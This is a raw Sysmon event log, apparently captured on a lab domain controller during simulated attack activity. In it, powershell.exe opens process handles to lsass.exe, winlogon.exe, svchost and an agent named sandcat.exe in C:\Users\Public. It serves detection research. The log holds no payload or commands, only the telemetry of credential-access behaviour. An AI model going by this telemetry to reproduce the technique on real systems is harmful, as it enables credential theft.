13:09:35.322{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-01-14 13:08:19.140 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-428D-6000-2500-000000009A01}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.306{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.291{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-2100-000000009A01}2432C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.291{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-1E00-000000009A01}2320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.291{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-1C00-000000009A01}2304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:35.291{08A6967A-4289-6000-1A00-000000009A01}22402804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FFF9FF83F41) 13241300x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:34.431{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:34.072{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 